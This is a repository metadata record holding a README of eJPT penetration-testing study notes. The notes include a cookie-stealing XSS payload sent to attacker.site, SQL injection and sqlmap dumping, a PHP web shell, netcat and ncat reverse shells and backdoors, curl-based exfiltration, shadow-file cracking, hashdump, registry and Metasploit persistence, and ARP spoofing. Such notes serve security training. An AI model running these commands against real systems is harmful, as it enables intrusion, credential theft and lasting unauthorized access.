{"id":16446502,"url":"https://github.com/edoardottt/ejpt-notes","last_synced_at":"2026-01-27T19:04:18.906Z","repository":{"id":109574772,"uuid":"535223455","full_name":"edoardottt/eJPT-notes","owner":"edoardottt","description":"Notes I took while preparing for eJPT certification by INE Security (passed 19/20, fka eLearn Security)","archived":false,"fork":false,"pushed_at":"2025-11-01T09:16:23.000Z","size":549,"stargazers_count":153,"open_issues_count":0,"forks_count":30,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-11-01T11:19:45.327Z","etag":null,"topics":["certification","certification-prep","certifications","cybersecurity","ejpt","ejpt-notes","elearnsecurity","exam","exam-prep","ine","infosec","nmap","notes","penetration-testing","pentesting","redteamer","training"],"latest_commit_sha":null,"homepage":"https://ejpt-notes.com/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/edoardottt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":"edoardottt","liberapay":"edoardottt","patreon":"edoardottt","ko_fi":"edoardottt","open_collective":"edoardottt","custom":"https://www.paypal.me/edoardottt"}},"created_at":"2022-09-11T07:32:01.000Z","updated_at":"2025-11-01T09:16:27.000Z","dependencies_parsed_at":"2023-11-29T10:48:58.418Z","dependency_job_id":"ad79772c-6018-4c0c-8c56-d66c75a74088","html_url":"https://github.com/edoardottt/eJPT-notes","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/edoardottt/eJPT-notes","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/edoardottt","download_url":"https://codeload.github.com/edoardottt/eJPT-notes/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/edoardottt%2FeJPT-notes/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28819062,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-27T18:44:20.126Z","status":"ssl_error","status_checked_at":"2026-01-27T18:44:09.161Z","response_time":168,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["certification","certification-prep","certifications","cybersecurity","ejpt","ejpt-notes","elearnsecurity","exam","exam-prep","ine","infosec","nmap","notes","penetration-testing","pentesting","redteamer","training"],"created_at":"2024-10-11T09:47:50.081Z","updated_at":"2026-01-27T19:04:18.898Z","avatar_url":"https://github.com/edoardottt.png","language":null,"funding_links":["https://github.com/sponsors/edoardottt","https://liberapay.com/edoardottt","https://patreon.com/edoardottt","https://ko-fi.com/edoardottt","https://opencollective.com/edoardottt","https://www.paypal.me/edoardottt"],"categories":[],"sub_categories":[],"readme":"\u003cp align=\"center\"\u003e\n\u003cimg width=\"60%\" src=\"./ejpt.jpg\"\u003e\n\u003c/p\u003e\n\n\u003e **Note**\n\u003e These are all the notes I took while following the INE course for eJPT certification, I strongly think everything you need to pass the exam is in this 'cheatsheet'.\n\nNotes by [@edoardottt](https://edoardottt.com/), exam passed with 19/20 score.\n\nInfo about eJPT certification [here](https://security.ine.com/certifications/ejpt-certification/).  \nRead also my [blog post](https://edoardottt.com/ejpt) about eJPT certification.\n\n#### Exam setup\n\n- Download OPVN configuration file\n- `sudo openvpn file.ovpn`\n- Enter username and password\n- CTRL+Z\n- `bg`\n\n#### Add a route in IP routes\n\nLinux:\n\n```bash\nip route \u003cdestination network\u003e via \u003cgateway\u003e\n```\n\n#### Show IP addresses\n\nLinux:\n\n```bash\nip addr\n```\n\n#### Show CAM table\n\nLinux:\n\n```bash\nip neighbor\n```\n\nor\n\n```bash\nifconfig\n```\n\n#### Show Listening ports (both UDP and TCP)\n\nLinux:\n\n```bash\nnetstat -tunp\n```\n\nWindows:\n\n```bash\nnetstat -ano\n```\n\n#### ARP Spoofing\n\n```bash\necho 1 \u003e /proc/sys/net/ipv4/ip_forward\n```\n\n```bash\narpspoof -i \u003cinterface\u003e -t \u003ctarget\u003e -r \u003chost\u003e\n```\n\nTo intercept the traffic between 192.168.4.11 and 192.168.4.16\n\n```bash\narpspoof -i eth0 -t 192.168.4.11 -r 192.168.4.16\n```\n\n#### Ping sweeping\n\n```bash\nfping -a -g 192.168.1.0/24 2\u003e /dev/null\n```\n\nor\n\n```bash\nfping -a -f targets.txt 2\u003e/dev/null\n```\n\nor\n\n```bash\nnmap -sn 192.168.1.0/24\n```\n\nor\n\n```bash\nnmap -sn -iL networks.txt\n```\n\n#### OS Fingerprinting\n\n```bash\nnmap -Pn -O \u003ctarget(s)\u003e\n```\n\n#### Port Scanning\n\n`nmap`...Then remember:\n\n- `-sT`: TCP Connect Scan, usually recorded in application logs\n- `-sS`: TCP Syn Scan, usually not recorded in app. logs (well configured IDSs do)\n- `-sV`: Version Detection Scan, TCP Connect Scan + Banner Detection\n\nExample:\n\n```bash\nnmap -sS -p 1-100,443 192.168.1.13,14\n```\n\nTip: Use `--reason` to show the explanation of why a port is marked open or closed  \nTip: Use `--open` to show only open, open|filtered, and unfiltered ports.\n\nTCP Quick Scan\n\n```bash\nnmap -sV -sC 192.168.1.1\n```\n\nTCP Full Scan\n\n```bash\nnmap -sV -sC -p- 192.168.1.1\n```\n\nUDP Quick Scan\n\n```bash\nnmap -sV -sU 192.168.1.1\n```\n\nGet info on a particular service\n\n```bash\nnmap -sC -p 27017 192.168.1.13 | less\n```\n\n#### Masscan\n\nCheck if masscan is properly installed:\n\n```bash\nmasscan --regress\n```\n\nScan example:\n\n```bash\nmasscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24\n```\n\nIf you want to use a VPN connection (configure the options properly):\n\n```bash\nmasscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 -e tap0 --router-ip 192.168.1.1\n```\n\nIn order to save the configuration into a file:\n\n```bash\nmasscan -p22,80,443,53,3389,8080,445 -Pn --rate=800 --banners 192.168.1.0/24 --echo \u003e masscan.conf\n```\n\nUse the configuration file as input:\n\n```bash\nmasscan -c masscan.conf\n```\n\n#### Web Fingerprinting\n\nUsing netcat:\n\n```bash\nnc 192.168.1.2 80\nHEAD / HTTP/1.1\n```\n\nUsing openssl:\n\n```bash\nopenssl s_client -connect target.site:443\nHEAD / HTTP/1.1\n```\n\nUsing httprint:\n\n```bash\nhttprint -P0 -h 192.168.1.1 -s /usr/local/bin/signatures.txt\n```\n\n#### Directory/Files enumeration with dirb\n\nDefault scan:\n\n```bash\ndirb http://google.com\n```\n\nUsing a custom wordlist:\n\n```bash\ndirb http://google.com /usr/share/dirb/wordlists/small.txt\n```\n\nUsing cookies:\n\n```bash\ndirb http://google.com -c \"COOKIE:XYZ\"\n```\n\nUsing Basic Authentication:\n\n```bash\ndirb http://google.com -u \"admin:password\"\n```\n\nUsing Custom Header:\n\n```bash\ndirb http://google.com -H \"MyHeader: MyContent\"\n```\n\nDisable recursive enumeration:\n\n```bash\ndirb http://google.com -r\n```\n\nSet Speed delay in milliseconds:\n\n```bash\ndirb http://google.com -z 1000\n```\n\nSpecify extensions:\n\n```bash\ndirb http://google.com -X \".php,.bak\"\n```\n\nSave results in a file:\n\n```bash\ndirb http://google.com -o results.txt\n```\n\n#### Google Dorks\n\n- `site:` Include only results on a given hostname\n- `intitle:` Filters according to the title of a page\n- `inurl:` Similar to intitle but works on the URL of a resource\n- `filetype:` Filters by using the file extension of a resource\n- `AND`, `OR`, `|` Use logical operators to combine your expressions\n- `-` Filter out a keyword or a command's result\n\nExample: `-inurl:(htm|html|php|asp|jsp) intitle:\"index of\" \"last modified\" \"parent directory\" txt OR doc OR pdf`  \nSee also the [Google Hacking Database](https://www.exploit-db.com/google-hacking-database)\n\n#### XSS\n\nPayload: `\u003cscript\u003evar i = new Image(); i.src = \"http://attacker.site/log.php?q+\"+document.cookie;\u003c/script\u003e`  \nServer:\n\n```php\n\u003c?php\n$filename=\"/tmp/log.txt\";\n$fp=fopen($filename, 'a');\n$cookie=$_GET['q'];\nfwrite($fp, $cookie);\nfclose($fp);\n?\u003e\n```\n\n#### SQLi\n\nPayloads:\n\n- `' OR 'a'='a`\n- `' UNION SELECT Username, Password FROM Accounts WHERE 'a'='a`\n- `' OR substr(user(),1,1) = 'a`\n- `' UNION SELECT user(); -- -`\n\nSqlmap:\n\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --cookie \"PHPSESSID=m42ba4etbktcktvjadirnsqqg4;`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' -p id --technique=U`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --banner`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' -v3 --fresh-queries`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --users`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --dbs`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --tables`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' -D \u003cdb-name\u003e -T \u003ctable-name\u003e`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db \u003cdb-name\u003e --columns`\n- `sqlmap -u 'http://victim.site/view.php?id=1141' --current-db \u003cdb-name\u003e --dump`\n- `sqlmap -u 'http://victim.site/login.php' --data='user=a\u0026pass=a' -p user --technique=B --banner`\n- `sqlmap -r post-vuln-sqli.txt -p user --technique=B --banner`\n\nTip: Dump only the data you're interested in, not the whole database. Dumping a lot of data using SQLi is very noisy and a heavy process.\n\n#### Misconfigured PUT method\n\n```bash\nwc -m payload.php\n20 payload.php\n```\n\n```bash\nnc victim.site 80\nPUT /payload.php HTTP/1.1\nHost: victim.site\nContent-type: text/html\nContent-length: 20\n\n\u003c?php phpinfo(); ?\u003e\n```\n\n#### Uploading PHP shell\n\n```php\n\u003c?php\nif (isset($_GET['cmd']))\n{\n    $cmd = $_GET['cmd'];\n    echo '\u003cpre\u003e';\n    $result = shell_exec($cmd);\n    echo $result;\n    echo '\u003c/pre\u003e';\n}\n?\u003e\n```\n\n#### Authentication Cracking with Hydra\n\n- `hydra -U http-post-form` (get info on a module)\n- `hydra -L users.txt -P passwords.txt \u003cservice://server\u003e \u003coptions\u003e`\n- `hydra crackme.site http-post-form \"/login.php:user=^USER^\u0026pwd=^PASS^:invalid credentials\" -L users.txt -P passwords.txt -f -V`\n- `hydra 192.168.1.2 ssh -L users.txt -P passwords.txt -f -V`\n\n#### Authentication Cracking with nmap\n\n- `nmap -p 22 --script ssh-brute --script-args userdb=/root/users.txt demo.ine.local`\n\n#### Authentication Cracking with metasploit\n\n- `use auxiliary/scanner/ssh/ssh_login`\n- `set RHOSTS demo.ine.local`\n- `set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt`\n- `set STOP_ON_SUCCESS true`\n- `set verbose true`\n- `exploit`\n\n#### Password cracking using John the Ripper\n\n- `unshadow /etc/passwd /etc/shadow \u003e crackme.txt`\n- `john --incremental -users:\u003cusers-list\u003e  crackme.txt` (bruteforce, don't use it!)\n- `john --show crackme.txt`\n- `john --wordlist=\u003cwordlist-filename\u003e crackme.txt`\n- `john --wordlist=\u003cwordlist-filename\u003e --rules crackme.txt` (enable word mangling)\n\n#### Cracking Password of Microsoft Word file using John the Ripper\n\n- `/usr/share/john/office2john.py MS_Word_Document.docx \u003e hash`\n- `john --wordlist=passwds.txt hash`\n\n#### Password cracking using Hashcat\n\n- `hashcat -m 0 -a 0 -D2 example0.hash example.dict` (m = 0 is MD5)\n- `hashcat -m 0 -a 0 -D2 example0.hash example.dict -r custom.rule`\n\n#### Windows Shares\n\nInteresting shares:\n\n- `\\\\ComputerName\\C$` lets an administrator access a volume (C$, D$, E$...)\n- `\\\\ComputerName\\admin$` points to the Windows installation directory\n\nEnumerating shares (Windows):\n\n- `nbtstat -A 192.168.1.11`\n- `net view 192.168.1.11`\n- `net use \\\\192.168.1.11\\IPC$ '' /u:''` (null session attack)\n- `enum -S 192.168.1.11` ([enum](https://packetstormsecurity.com/search/?q=win32+enum\u0026s=files))\n- `enum -U 192.168.1.11`\n- `enum -P 192.168.1.11`\n\nEnumerating shares (Linux):\n\n- `nmblookup -A 192.168.1.11`\n- `smbclient -L //192.168.1.11 -N`\n- `smbclient //192.168.1.11/IPC$ -N` (null session attack)\n- `enum4linux -n 192.168.1.11`\n- `enum4linux -P 192.168.1.11`\n- `enum4linux -S 192.168.1.11`\n- `enum4linux -s /usr/share/enum4linux/share-list.txt 192.168.1.11`\n- `enum4linux -a 192.168.1.11`\n- `smbmap -H demo.ine.local`\n- `nmap -sU -sV -p137,138 demo.ine.local`\n- `nmap -script=smb-enum-shares -Pn 192.168.1.11`\n- `nmap -script=smb-enum-users -Pn 192.168.1.11`\n- `nmap -script=smb-brute -Pn 192.168.1.11`\n- `nmap --script smb-vuln-* -Pn 192.168.1.11`\n- `python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.1.11`\n\n#### Metasploit\n\n```bash\nmsfconsole\n```\n\n```bash\nshow -h\n```\n\n```bash\nsearch \u003ckeyword(s)\u003e\n```\n\n```bash\nuse \u003cpath-to-exploit\u003e\n```\n\n```bash\nshow options\n```\n\n```bash\nset \u003coption-name\u003e \u003coption-value\u003e \n```\n\n```bash\nexploit\n```\n\nTip: Use `show payloads` when an exploit is selected to show only the available payloads for that exploit  \nTip: Use `info` when an exploit is selected to get information about the exploit  \nTip: Use `back` when an exploit is selected to return to unselect it  \n\n#### Meterpreter\n\nInside metasploit:\n\n- `search meterpreter`\n- `set payload \u003cpayload-path\u003e`\n- `background`\n- `sessions -l` (list the sessions)\n- `sessions -i \u003csession-id\u003e` (resume a background session)\n- `sysinfo`\n- `ifconfig`\n- `route`\n- `getuid`\n- `getsystem`\n- You can use Unix-like commands like `pwd`, `ls`, `cd`...\n- `download \u003cfilename\u003e \u003clocation\u003e`\n- `upload \u003cfilename\u003e \u003clocation\u003e`\n- `shell`\n- `hashdump`\n- `run autoroute -h`\n- `run autoroute -s 192.130.110.0 -n 255.255.255.0` (pivoting towards that network)\n\nTip: `help` shows an amazing list of available commands divided by category  \nTip: If `getsystem` fails, use `use exploit/windows/local/bypassuac`  \nTip: `ps -U SYSTEM` shows only the processes with SYSTEM privileges  \nTip: Use `post/windows/gather/hashdump` to dump the passwords DB and save it for an offline cracking session  \n\n#### Pivoting with Meterpreter\n\nLet's say we have compromised a machine using metasploit and we have a meterpreter shell with session id 1. We discover that there is another machine but it's reachable only from the compromised machine.  \nOur IP: `192.180.40.2`  \nCompromised host: `192.180.40.3`  \nUnreachable machine: `192.130.110.3`  \n\n- `meterpreter \u003e run autoroute -s 192.130.110.0 -n 255.255.255.0 1`\n- `background`\n- `msf \u003e route`\n\nIf we want to scan the `192.130.110.0/24` network we can use:\n\n```bash\nmsf \u003e use auxiliary/scanner/portscan/tcp\nmsf \u003e set PORTS 80, 8080, 445, 21, 22, ...\nmsf \u003e set RHOSTS 192.130.110.1-254\nmsf \u003e exploit\n```\n\nIf we discover that at least one port is open and we want to target a specific port on a specific host (e.g. `192.130.110.3:21`) we can use:\n\n- `sessions 1` (back to meterpreter session)\n- `portfwd add -l 1234 -p 21 -r 192.130.110.3` (forwarding remote machine port 21 to the local machine port 1234)\n- `portfwd list`\n- `background`\n\nThen if we want to scan the service we can use nmap:\n\n```bash\nmsf \u003e nmap -sS -sV -p 1234 localhost\n```\n\n#### Reverse shell with Netcat\n\nAttacker:\n\n```bash\nnc -lvp 8888 -e /bin/bash\n```\n\nTarget (the IP of the attacker):\n\n```bash\nnc -v 192.168.1.1 8888\n```\n\n#### Generate a reverse shell payload with msfvenom\n\n```bash\nmsfvenom --list payloads | grep \u003ckeyword\u003e\n```\n\n```bash\nmsfvenom -p php/reverse_php lhost=192.168.0.58 lport=443 -o reverse.php\n```\n\n```bash\nmsfvenom -p linux/x64/shell/reverse_tcp lhost=192.168.0.58 lport=443 -f elf -o reverse443\nchmod +x reverse443\n```\n\nNote: If you have generated a meterpreter payload shell, you have to use meterpreter in order to receive back the connection  \n\n#### Blind Remote Code Execution\n\nTarget (Use the Attacker IP)\n\n```bash\ncurl http://192.168.1.130:53/`whoami`\n```\n\nor\n\n```bash\ncurl http://192.168.1.130:53/`id | base64`\n```\n\nAttacker:\n\n```bash\nnc -lvp 53\n```\n\nTip: You can also create a reverse shell with `msfvenom` and let the target download it  \n\n#### Enumerating users history with meterpreter\n\n- `background`\n- `use post/linux/gather/enum_users_history`\n- `set SESSION 1`\n- `exploit`\n\n#### Data exfiltration with Netcat\n\nReceiver:\n\n```bash\nnc -lvnp 8888 \u003e received.txt\n```\n\nSender (the IP of the receiver):\n\n```bash\ncat message.txt | nc -v 192.168.1.1 8888\n```\n\n#### Backdoor using ncat\n\nVictim:\n\n```bash\nncat -l -p 5555 -e cmd.exe\n```\n\nAttacker (the IP of the victim):\n\n```bash\nncat 192.168.1.66 5555\n```\n\n#### Reverse Backdoor using ncat\n\nAttacker:\n\n```bash\nncat -l -p 5555 -v\n```\n\nVictim (the IP of the attacker):\n\n```bash\nncat -e cmd.exe 192.168.1.66 5555\n```\n\nTip: For persistent reverse backdoor use the registry key `Computer\\HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run`\n\n#### Reverse Backdoor using Metasploit\n\n```bash\nmsfconsole\nuse exploit/windows/local/s4u_persistence\nshow options\nsessions\nset session \u003csession-id\u003e\nset trigger logon\nset payload windows/meterpreter/reverse_tcp\nset lhost \u003clocal-ip\u003e\nset lport 1234\nexploit\nuse exploit/multi/handler\nset payload windows/meterpreter/reverse_tcp\nshow options\nset lhost \u003clocal-ip\u003e\nset lport 1234\nexploit\nsysinfo\nps\nhelp\n```\n\nTip: once we get a shell we can use `screenshot` to get a picture of what the victim is seeing on the Desktop  \nTip: once we get a shell we can use `download filename location` to save the filename in the specified location on our machine  \nTip: Same syntax as above but use `upload` to upload files  \nTip: Use `getsystem` to gain the highest privilege (i.e. SYSTEM) on the compromised machine and `getuid` to check if it actually worked.\n\n#### Upgrading a simple shell\n\n```bash\nbash -i\n```\n\n```bash\npython -c 'import pty; pty.spawn(\"/bin/sh\")'\n```\n\n#### Maintaining access using Metasploit (Windows)\n\nInside a meterpreter session:\n\n- `background`\n- `use exploit/windows/local/persistence_service`\n- `show options`\n- `set SESSION \u003csession-id\u003e`\n- `exploit`\n\nUse the backdoor:\n\n- `background`\n- `sessions -K`\n- `use exploit/multi/handler`\n- `set PAYLOAD windows/meterpreter/reverse_tcp`\n- `set LHOST \u003cyour-ip\u003e`\n- `set LPORT 4444`\n- `exploit`\n\nNote: The `\u003csession-id\u003e` is the one you can read when you type `background`  \nNote: We need to use the same information about the backdoor to receive a new meterpreter session on the multi-handler. We can't change Payload, IP or Ports details.\n\n#### Pivoting using a SOCKS Proxy\n\nYou have access to a compromised host and only from there you can access another machine. That machine exposes a web server, in order to access it from your computer set up a SOCKS proxy.\n\nAdd the route to the unreachable network using autoroute or route.\n\n```bash\nmsf \u003e use auxiliary/server/socks_proxy\nmsf \u003e set VERSION 4a\nmsf \u003e set SRVPORT 9050\nmsf \u003e run -j\n```\n\n```bash\nroot@INE:~# proxychains nmap ...\n```\n\nThen you can also setup firefox in order to send request using the SOCKS proxy v4 at `127.0.0.1:9050`.\n\n#### Dump AutoLogin stored credentials\n\nInside a meterpreter session:\n\n- `migrate -N explorer.exe`\n- `background`\n- `use post/windows/gather/credentials/windows_autologin`\n- `set SESSION \u003csession-id\u003e`\n- `exploit`\n\n----------\n\nIf you find an error or want to improve this page, just [open an issue](https://github.com/edoardottt/eJPT-notes/issues).\n\n**Don't** text/mail me looking for exam solutions.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fedoardottt%2Fejpt-notes","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fedoardottt%2Fejpt-notes","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fedoardottt%2Fejpt-notes/lists"}